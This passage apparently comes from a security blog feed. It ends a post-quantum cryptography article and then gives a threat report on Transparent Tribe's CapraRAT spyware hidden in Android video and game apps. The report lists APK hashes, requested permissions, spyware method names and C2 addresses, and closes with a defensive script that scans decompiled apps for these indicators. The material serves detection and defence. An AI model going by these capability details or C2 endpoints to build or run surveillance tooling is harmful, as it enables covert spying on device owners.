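        classical_secret + pq_secret)
    print(session_key.hex())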

Summing up

Fear of quantum computers may or may not be overblown. We just don’t know yet. But the effect of post-quantum crypto research and standardization efforts is that we’ve taken a ton of eggs out of one basket and we’re building a much more diverse and modern set of baskets instead.

Post-quantum standards will eventually replace older, more finicky algorithms with algorithms that don’t fall apart over the tiniest of subtleties. Several common sources of implementation error will be eliminated. Developers will be able to select algorithms to fit a broad range of use cases. The variety of new mathematical bases provides a “backup plan” if a mathematical breakthrough renders one of the algorithms insecure. Post-quantum algorithms aren’t a panacea, but they certainly treat a lot of the headaches we see at Trail of Bits.

Forget quantum computers, and look at post-quantum crypto research and standardization for what it is: a diversification and modernization effort.

CapraTube Remix | Transparent Tribe’s Android Spyware Targeting Gamers, Weapons Enthusiasts

1 July 2024 at 12:55

Executive Summary

  • SentinelLabs has identified four new CapraRAT APKs associated with suspected Pakistan state-aligned actor Transparent Tribe.
  • These APKs continue the group’s trend of embedding spyware into curated video browsing applications, with a new expansion targeting mobile gamers, weapons enthusiasts, and TikTok fans.
  • The overall functionality remains the same, with the underlying code updated to better suit modern Android devices.

Overview

Transparent Tribe (aka APT 36, Operation C-Major) has been active since at least 2016 with attacks against Indian government and military personnel. The group relies heavily on social engineering attacks to deliver a variety of Windows and Android spyware, including spear-phishing and watering hole attacks.

In September 2023, SentinelLabs outlined the CapraTube campaign, which used weaponized Android applications (APK) designed to mimic YouTube, often in a suspected dating context due to the nature of the videos served. The activity highlighted in this report shows the continuation of this technique with updates to the social engineering pretexts as well as efforts to maximize the spyware’s compatibility with older versions of the Android operating system while expanding the attack surface to include modern versions of Android.

New CapraRAT APKs

SHA-1: c307f523a1d1aa928fe3db2c6c3ede6902f1084b
App Name: Crazy Game signed.apk
Package Name: com.maeps.crygms.tktols

SHA-1: dba9f88ba548cebfa389972cddf2bec55b71168b
App Name: Sexy Videos signed.apk
Package Name: com.nobra.crygms.tktols

SHA-1: 28bc3b3d8878be4267ee08f20b7816a6ba23623e
App Name: TikTok signed.apk
Package Name: com.maeps.vdosa.tktols

SHA-1: fff24e9f11651e0bdbee7c5cd1034269f40fc424
App Name: Weapons signed.apk
Package Name: com.maeps.vdosa.tktols
New CapraRAT app logos

The new versions of CapraRAT each use WebView to launch a URL to either YouTube or a mobile gaming site, CrazyGames[.]com. There is no indication that an app with the same name, Crazy Games, is weaponized as it does not require several key CapraRAT permissions, such as sending SMS, making calls, accessing contacts, or recording audio and video. The URL query in the CapraRAT code is obfuscated as htUUtps://www.youUUtube.com/resulUUts?seUUarch_quUUery=TiUUk+ToUUks, which is cleaned to remove occurrences of UU, resulting in https[:]//www.youtube[.]com/results?search_query=Tik+Toks.

URL deobfuscation and loading performed by CapraRAT’s load_web method
Decompiled view of load_web method
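
In Python terms, that cleanup step amounts to a simple string replacement (a paraphrase of the decompiled logic, not the original code):

    # Paraphrase of CapraRAT's string deobfuscation step (not the original code).
    obfuscated = "htUUtps://www.youUUtube.com/resulUUts?seUUarch_quUUery=TiUUk+ToUUks"
    url = obfuscated.replace("UU", "")
    print(url)  # https://www.youtube.com/results?search_query=Tik+Toks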

The previous CapraTube campaign had one APK called Piya Sharma that was likely used in a romance-themed social engineering pretext. The new campaign continues that trend with the Sexy Videos app. While two of the previously reported apps launched only YouTube with no query, the YouTube apps from this campaign are each preloaded with a query related to the application’s theme. The TikTok app launches YouTube with the query “Tik Toks,” and the Weapons app launches the Forgotten Weapons YouTube channel, which reviews a variety of classic arms and has 2.7 million subscribers.

TikTok and Weapons-themed CapraRAT YouTube WebView

The Crazy Games app launches WebView to load CrazyGames[.]com, a site containing in-browser mini games. This particularly resource-intensive site did not work well on older versions of Android during our testing.

Crazy Games CapraRAT WebView

When the app first launches, the user is prompted to grant several risky permissions, including:

  • Access GPS location
  • Manage network state
  • Read and send SMS
  • Read contacts
  • Record audio and screen, take screenshots
  • Storage read and write access
  • Use camera
  • View call history and make calls

In contrast with the previous CapraRAT campaign, the following Android permissions are no longer requested or used:

  • READ_INSTALL_SESSIONS
  • GET_ACCOUNTS
  • AUTHENTICATE_ACCOUNTS
  • REQUEST_INSTALL_PACKAGES

The reduction in permissions suggests the app developers are focused on making CapraRAT a surveillance tool more than a fully featured backdoor.

App Compatibility

The most significant changes between this campaign and the September 2023 campaign concern app compatibility. The newest CapraRAT APKs we identified now contain references to Android’s Oreo version (Android 8.0), which was released in 2017. Previous versions relied on the device running Lollipop (Android 5.1), which was released in 2015 and is less likely to be compatible with modern Android devices.

We tested the APKs from this campaign and the September 2023 campaign on devices running Android 13 (Tiramisu, 2022) and Android 14 (2023). The new campaign’s apps ran smoothly on these modern versions of Android. The September 2023 campaign’s apps prompted a compatibility warning dialog, which could raise suspicion among victims that the app is abnormal. When running on Android 14, the newest released version, the September 2023 campaign’s Piya Sharma app fails to install. Each of the newer versions ran successfully.

In all cases, the app still requests gratuitous permissions from the user that hint at the tool’s capabilities. Even if the user declines the permissions, the app still runs, meaning the group has not overcome this hurdle to implementing their spyware successfully.

Piya Sharma app install failure dialog on Android 14

The new CapraRAT packages also contain a very minimal new class called WebView, which is responsible for maintaining compatibility with older versions of Android via the Android Support Library, a library developers can choose to include in a project to enhance compatibility.

Spyware Activities and C2

The app’s MainActivity initiates requests for permissions. The app still runs even if permissions are not granted.

MainActivity calls the TCHPClient class, which contains the malicious capabilities leveraged by CapraRAT. This class drives several spyware classes and methods, including:

  • audioStreamer (aStreamer)
  • CallLogLister
  • CallReceiver
  • ContactsLister
  • DirLister (file browsing)
  • downloadFile
  • killFile (file deletion)
  • killProcess
  • PhotoTaker
  • SMSLister
  • SMSReceiver

These give the spyware fine-grained control over what the user does on the device.

The sendData method is responsible for assembling the data collected by other methods and classes and sending it to the C2. The mRun method constructs the socket and sends the data to the C2 server using the variables specified in the Settings class. Each of the current campaign’s APKs uses the same C2 server hostname, IP address, and TCP port number, 18582. The Settings class also shows the same CapraRAT version identifier for each APK, A.D.0.2.

CapraRAT’s Settings class shows the tool’s configuration variables

mRun performs a connectivity check to decide whether to connect to the C2 using the hostname shareboxs[.]net or the hardcoded IP address 173[.]249[.]50[.]243. This IP address has been tied to Transparent Tribe’s CrimsonRAT and AhMyth Android RAT C2 activity since at least 2022. As of this writing, shareboxs[.]net resolves to 173[.]212[.]206[.]227.

Conclusion

The updates to the CapraRAT code between the September 2023 campaign and the current campaign are minimal, but they suggest the developers are focused on making the tool more reliable and stable. The decision to move to newer versions of the Android OS is logical, and likely aligns with the group’s sustained targeting of individuals in the Indian government or military space, who are unlikely to use devices running older versions of Android, such as Lollipop, which was released in 2015.

The APK theme updates show the group continues to lean into its social engineering prowess to gain a wider audience of targets who would be interested in the new app lures, such as mobile gamers or weapons enthusiasts.

To help prevent compromise by CapraRAT and similar malware, users should always evaluate the permissions requested by an app to determine if they are necessary. For example, an app that only displays TikTok videos does not need the ability to send SMS messages, make calls, or record the screen. In incident response scenarios, treat the related network indicators of compromise as suspect, including the use of port 18582, and search suspect apps for the presence of strings using the unique method names outlined in the Spyware Activities & C2 section of this report.
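
As a starting point for that kind of triage, a simple script along the following lines can flag decompiled APK sources containing the method names and network indicators listed in this report; the decompilation step and directory layout are assumptions left to the analyst:

    # Simple triage sketch: search decompiled APK sources for CapraRAT indicators.
    import pathlib

    INDICATORS = [
        "TCHPClient", "CallLogLister", "DirLister", "PhotoTaker",
        "SMSLister", "shareboxs.net", "173.249.50.243", "18582",
    ]

    def scan(decompiled_dir):
        # decompiled_dir: output of a decompiler such as jadx (assumed workflow)
        for path in pathlib.Path(decompiled_dir).rglob("*"):
            if not path.is_file():
                continue
            try:
                text = path.read_text(errors="ignore")
            except OSError:
                continue
            hits = [i for i in INDICATORS if i in text]
            if hits:
                print(f"{path}: {', '.join(hits)}")

    if __name__ == "__main__":
        scan("decompiled_apk/")   # hypothetical path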

Indicators of Compromise

Files

SHA1 Name
28bc3b3d8878be4267ee08f20b7816a6ba23623e TikTok signed.apk
c307f523a1d1aa928fe3db2c6c3ede6902f1084b Crazy Game signed.apk
dba9f88ba548cebfa389972cddf2bec55b71168b Sexy Videos signed.apk
fff24e9f11651e0bdbee7c5cd1034269f40fc424 Weapons signed.apk

Network Indicators

Domain/IP Description
shareboxs[.]net C2 domain
173[.]212[.]206[.]227 Resolved C2 IP address, hosts shareboxs.net
173[.]249[.]50[.]243 Hardcoded failover C2 IP address
